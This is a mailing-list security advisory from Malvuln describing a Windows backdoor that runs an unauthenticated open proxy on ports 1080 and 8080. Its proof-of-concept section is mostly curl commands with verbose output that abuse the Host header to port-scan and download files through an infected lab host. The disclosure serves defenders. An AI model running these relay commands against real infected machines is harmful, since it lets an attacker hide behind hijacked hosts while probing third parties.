
Date: Sat, 17 Apr 2021 21:49:27 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/d7648b676dd139d1b7ba781816726510.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: HEUR.Backdoor.Win32.Generic
Vulnerability: Unauthenticated Open Proxy
Description: The backdoor creates a Windows service backed by an executable
named "1314.exe", it lives under C:\WINDOWS and listens on TCP ports 1080
and 8080. Third-party adversaries who can connect to the infected system
can relay requests from the original connection to the destination and then
back to the origination system. Attackers may then be able to launch
attacks, download files or port scan third party systems and it will appear
as the attacks originated from that infected host. The relay does not
require authentication or any special User-agent check and leverages the
HTTP Host header in the request to connect to third-party systems.
Type: PE32
MD5: d7648b676dd139d1b7ba781816726510
Vuln ID: MVID-2021-0176
Dropped files: 1314.exe
Disclosure: 04/17/2021

Exploit/PoC:
Port scanning / File download:

PORT 21 CLOSED:

curl http://192.168.88.127:8080 -H "Host: 192.168.88.129:21"  -v
* Rebuilt URL to: http://192.168.88.127:8080/
*   Trying 192.168.88.127...
* TCP_NODELAY set
* Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:21
> User-Agent: curl/7.55.1
> Accept: */*
>
* Empty reply from server
* Connection #0 to host 192.168.88.127 left intact
curl: (52) Empty reply from server

PORT 21 OPEN:

curl http://192.168.88.127:8080 -H "Host: 192.168.88.129:21"  -v
* Rebuilt URL to: http://192.168.88.127:8080/
*   Trying 192.168.88.127...
* TCP_NODELAY set
* Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:21
> User-Agent: curl/7.55.1
> Accept: */*
>
220 INetSim FTP Service ready.
500 Unknown command.

PORT 110 OPEN

curl http://192.168.88.127:8080 -H "Host: 192.168.88.129:110"  -v
* Rebuilt URL to: http://192.168.88.127:8080/
*   Trying 192.168.88.127...
* TCP_NODELAY set
* Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
> GET / HTTP/1.1
> Host: 192.168.88.129:110
> User-Agent: curl/7.55.1
> Accept: */*
>
+OK INetSim POP3 Server ready <2433.1618704869@...3host>
-ERR Unknown command.

DOWNLOAD FILES

curl http://192.168.88.127:8080/DOOM.exe -H "Host: 192.168.88.129:2222"
 --output 666.exe -v
*   Trying 192.168.88.127...
* TCP_NODELAY set
  % Total    % Received % Xferd  Average Speed   Time    Time     Time
 Current
                                 Dload  Upload   Total   Spent    Left
 Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
  0* Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
  0> GET /DOOM.exe HTTP/1.1
> Host: 192.168.88.129:2222
> User-Agent: curl/7.55.1
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: SimpleHTTP/0.6 Python/2.7.6
< Date: Sun, 18 Apr 2021 00:19:01 GMT
< Content-type: application/x-msdos-program
< Content-Length: 103533
< Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT
<
{ [102194 bytes data]
100  101k  100  101k    0     0   101k      0  0:00:01 --:--:--  0:00:01
 587k
* Closing connection 0


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
